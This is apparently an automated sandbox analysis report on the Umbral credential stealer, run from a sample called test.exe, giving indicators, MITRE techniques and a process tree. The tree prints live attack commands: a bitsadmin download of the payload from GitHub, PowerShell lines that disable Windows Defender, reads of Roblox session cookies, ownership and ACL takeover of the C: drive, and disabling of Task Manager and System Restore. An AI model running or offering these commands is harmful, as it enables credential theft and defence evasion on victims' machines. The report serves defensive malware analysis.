umbral | 0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5

Analysis

max time kernel
134s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-08-2024 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

97KB
MD5

76e3b500026a13b38f9f898f54db8d38
SHA1

25a2c9fac994627ad49067f132ee0d320025f23b
SHA256

0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5
SHA512

15e974221e1da794fae0abc4f3e4c1c67631b3bc0b4a95df4bb31912de5831d9470b90217e90d347ceab8a5a0623663fe99d9be27155598408f009a3b5fd4f93
SSDEEP

1536:r7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf/wTA+J/pOg:n7DhdC6kzWypvaQ0FxyNTBf/Q

Score

10^/10

umbral credential_access discovery dropper execution exploit stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/1676-2-0x000001EFC63E0000-0x000001EFC6420000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
45	2792	WScript.exe
51	2792	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1256	powershell.exe
2432	powershell.exe
2732	powershell.exe
4328	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3660	bitsadmin.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2600	takeown.exe
4292	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2600	takeown.exe
4292	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
29	raw.githubusercontent.com
30	raw.githubusercontent.com
55	discord.com
56	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	test.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2036	cmd.exe
4796	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
5040	timeout.exe
2688	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2044	wmic.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
4364	taskkill.exe
1104	taskkill.exe
4432	taskkill.exe
3152	taskkill.exe
2660	taskkill.exe
1628	taskkill.exe
4888	taskkill.exe
3568	taskkill.exe
3640	taskkill.exe
3892	taskkill.exe
4688	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4796	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	45	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	51	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1676	Umbral.exe
4328	powershell.exe
4328	powershell.exe
1256	powershell.exe
1256	powershell.exe
2432	powershell.exe
2432	powershell.exe
2124	powershell.exe
2124	powershell.exe
2732	powershell.exe
2732	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2600	takeown.exe
Token: SeTakeOwnershipPrivilege	2600	takeown.exe
Token: SeDebugPrivilege	1676	Umbral.exe
Token: SeIncreaseQuotaPrivilege	3420	wmic.exe
Token: SeSecurityPrivilege	3420	wmic.exe
Token: SeTakeOwnershipPrivilege	3420	wmic.exe
Token: SeLoadDriverPrivilege	3420	wmic.exe
Token: SeSystemProfilePrivilege	3420	wmic.exe
Token: SeSystemtimePrivilege	3420	wmic.exe
Token: SeProfSingleProcessPrivilege	3420	wmic.exe
Token: SeIncBasePriorityPrivilege	3420	wmic.exe
Token: SeCreatePagefilePrivilege	3420	wmic.exe
Token: SeBackupPrivilege	3420	wmic.exe
Token: SeRestorePrivilege	3420	wmic.exe
Token: SeShutdownPrivilege	3420	wmic.exe
Token: SeDebugPrivilege	3420	wmic.exe
Token: SeSystemEnvironmentPrivilege	3420	wmic.exe
Token: SeRemoteShutdownPrivilege	3420	wmic.exe
Token: SeUndockPrivilege	3420	wmic.exe
Token: SeManageVolumePrivilege	3420	wmic.exe
Token: 33	3420	wmic.exe
Token: 34	3420	wmic.exe
Token: 35	3420	wmic.exe
Token: 36	3420	wmic.exe
Token: SeIncreaseQuotaPrivilege	3420	wmic.exe
Token: SeSecurityPrivilege	3420	wmic.exe
Token: SeTakeOwnershipPrivilege	3420	wmic.exe
Token: SeLoadDriverPrivilege	3420	wmic.exe
Token: SeSystemProfilePrivilege	3420	wmic.exe
Token: SeSystemtimePrivilege	3420	wmic.exe
Token: SeProfSingleProcessPrivilege	3420	wmic.exe
Token: SeIncBasePriorityPrivilege	3420	wmic.exe
Token: SeCreatePagefilePrivilege	3420	wmic.exe
Token: SeBackupPrivilege	3420	wmic.exe
Token: SeRestorePrivilege	3420	wmic.exe
Token: SeShutdownPrivilege	3420	wmic.exe
Token: SeDebugPrivilege	3420	wmic.exe
Token: SeSystemEnvironmentPrivilege	3420	wmic.exe
Token: SeRemoteShutdownPrivilege	3420	wmic.exe
Token: SeUndockPrivilege	3420	wmic.exe
Token: SeManageVolumePrivilege	3420	wmic.exe
Token: 33	3420	wmic.exe
Token: 34	3420	wmic.exe
Token: 35	3420	wmic.exe
Token: 36	3420	wmic.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeIncreaseQuotaPrivilege	4604	wmic.exe
Token: SeSecurityPrivilege	4604	wmic.exe
Token: SeTakeOwnershipPrivilege	4604	wmic.exe
Token: SeLoadDriverPrivilege	4604	wmic.exe
Token: SeSystemProfilePrivilege	4604	wmic.exe
Token: SeSystemtimePrivilege	4604	wmic.exe
Token: SeProfSingleProcessPrivilege	4604	wmic.exe
Token: SeIncBasePriorityPrivilege	4604	wmic.exe
Token: SeCreatePagefilePrivilege	4604	wmic.exe
Token: SeBackupPrivilege	4604	wmic.exe
Token: SeRestorePrivilege	4604	wmic.exe
Token: SeShutdownPrivilege	4604	wmic.exe
Token: SeDebugPrivilege	4604	wmic.exe
Token: SeSystemEnvironmentPrivilege	4604	wmic.exe
Token: SeRemoteShutdownPrivilege	4604	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4228 wrote to memory of 3268	4228	test.exe	85
PID 4228 wrote to memory of 3268	4228	test.exe	85
PID 3268 wrote to memory of 3660	3268	cmd.exe	86
PID 3268 wrote to memory of 3660	3268	cmd.exe	86
PID 3268 wrote to memory of 1676	3268	cmd.exe	92
PID 3268 wrote to memory of 1676	3268	cmd.exe	92
PID 3268 wrote to memory of 2600	3268	cmd.exe	93
PID 3268 wrote to memory of 2600	3268	cmd.exe	93
PID 3268 wrote to memory of 4292	3268	cmd.exe	94
PID 3268 wrote to memory of 4292	3268	cmd.exe	94
PID 3268 wrote to memory of 4856	3268	cmd.exe	95
PID 3268 wrote to memory of 4856	3268	cmd.exe	95
PID 3268 wrote to memory of 4912	3268	cmd.exe	96
PID 3268 wrote to memory of 4912	3268	cmd.exe	96
PID 3268 wrote to memory of 2148	3268	cmd.exe	97
PID 3268 wrote to memory of 2148	3268	cmd.exe	97
PID 3268 wrote to memory of 2792	3268	cmd.exe	98
PID 3268 wrote to memory of 2792	3268	cmd.exe	98
PID 3268 wrote to memory of 5040	3268	cmd.exe	99
PID 3268 wrote to memory of 5040	3268	cmd.exe	99
PID 1676 wrote to memory of 3420	1676	Umbral.exe	100
PID 1676 wrote to memory of 3420	1676	Umbral.exe	100
PID 1676 wrote to memory of 2060	1676	Umbral.exe	104
PID 1676 wrote to memory of 2060	1676	Umbral.exe	104
PID 1676 wrote to memory of 4328	1676	Umbral.exe	106
PID 1676 wrote to memory of 4328	1676	Umbral.exe	106
PID 1676 wrote to memory of 1256	1676	Umbral.exe	108
PID 1676 wrote to memory of 1256	1676	Umbral.exe	108
PID 1676 wrote to memory of 2432	1676	Umbral.exe	110
PID 1676 wrote to memory of 2432	1676	Umbral.exe	110
PID 1676 wrote to memory of 2124	1676	Umbral.exe	112
PID 1676 wrote to memory of 2124	1676	Umbral.exe	112
PID 1676 wrote to memory of 4604	1676	Umbral.exe	115
PID 1676 wrote to memory of 4604	1676	Umbral.exe	115
PID 1676 wrote to memory of 1616	1676	Umbral.exe	117
PID 1676 wrote to memory of 1616	1676	Umbral.exe	117
PID 1676 wrote to memory of 628	1676	Umbral.exe	119
PID 1676 wrote to memory of 628	1676	Umbral.exe	119
PID 1676 wrote to memory of 2732	1676	Umbral.exe	121
PID 1676 wrote to memory of 2732	1676	Umbral.exe	121
PID 1676 wrote to memory of 2044	1676	Umbral.exe	123
PID 1676 wrote to memory of 2044	1676	Umbral.exe	123
PID 1676 wrote to memory of 2036	1676	Umbral.exe	125
PID 1676 wrote to memory of 2036	1676	Umbral.exe	125
PID 2036 wrote to memory of 4796	2036	cmd.exe	127
PID 2036 wrote to memory of 4796	2036	cmd.exe	127
PID 3268 wrote to memory of 4788	3268	cmd.exe	128
PID 3268 wrote to memory of 4788	3268	cmd.exe	128
PID 3268 wrote to memory of 2280	3268	cmd.exe	129
PID 3268 wrote to memory of 2280	3268	cmd.exe	129
PID 3268 wrote to memory of 2688	3268	cmd.exe	130
PID 3268 wrote to memory of 2688	3268	cmd.exe	130
PID 3268 wrote to memory of 3640	3268	cmd.exe	132
PID 3268 wrote to memory of 3640	3268	cmd.exe	132
PID 3268 wrote to memory of 4432	3268	cmd.exe	133
PID 3268 wrote to memory of 4432	3268	cmd.exe	133
PID 3268 wrote to memory of 3892	3268	cmd.exe	134
PID 3268 wrote to memory of 3892	3268	cmd.exe	134
PID 3268 wrote to memory of 4688	3268	cmd.exe	173
PID 3268 wrote to memory of 4688	3268	cmd.exe	173
PID 3268 wrote to memory of 3152	3268	cmd.exe	261
PID 3268 wrote to memory of 3152	3268	cmd.exe	261
PID 3268 wrote to memory of 1628	3268	cmd.exe	137
PID 3268 wrote to memory of 1628	3268	cmd.exe	137

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2060	attrib.exe

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE80.tmp\AE81.tmp\AE91.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3268
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    3⤵
    - Download via BitsAdmin
    PID:3660
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Drops file in Drivers directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1676
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3420
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Views/modifies file attributes
      PID:2060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2124
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4604
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:1616
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2732
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2044
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2036
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4796
- - C:\Windows\system32\takeown.exe
    takeown /f C:\*.*
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2600
- - C:\Windows\system32\icacls.exe
    Icacls C:\*.* /C /G Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4292
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:4856
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:4912
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2140.vbs"
    3⤵
    PID:2148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:1020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffcb98946f8,0x7ffcb9894708,0x7ffcb9894718
        5⤵
        
        PID:4820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        5⤵
        
        PID:1612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        5⤵
        
        PID:5124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
        5⤵
        
        PID:5180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
        5⤵
        
        PID:5248
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
        5⤵
        
        PID:5256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
        5⤵
        
        PID:5740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
        5⤵
        
        PID:5968
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
        5⤵
        
        PID:5160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
        5⤵
        
        PID:5952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6011921291217433641,11805739297918226190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
        5⤵
        
        PID:6420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb98946f8,0x7ffcb9894708,0x7ffcb9894718
        5⤵
        
        PID:5688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffcb98946f8,0x7ffcb9894708,0x7ffcb9894718
        5⤵
        
        PID:5916
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb98946f8,0x7ffcb9894708,0x7ffcb9894718
        5⤵
        
        PID:6108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6140
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb98946f8,0x7ffcb9894708,0x7ffcb9894718
        5⤵
        
        PID:5240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffcb98946f8,0x7ffcb9894708,0x7ffcb9894718
        5⤵
        
        PID:6364
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20112.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:2792
- - C:\Windows\system32\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:5040
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:4788
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\24298.vbs"
    3⤵
    PID:2280
- - C:\Windows\system32\timeout.exe
    timeout 14
    3⤵
    - Delays execution with timeout.exe
    PID:2688
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hl2.exe
    3⤵
    - Kills process with taskkill
    PID:3640
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM javaw.exe
    3⤵
    - Kills process with taskkill
    PID:4432
- - C:\Windows\system32\taskkill.exe
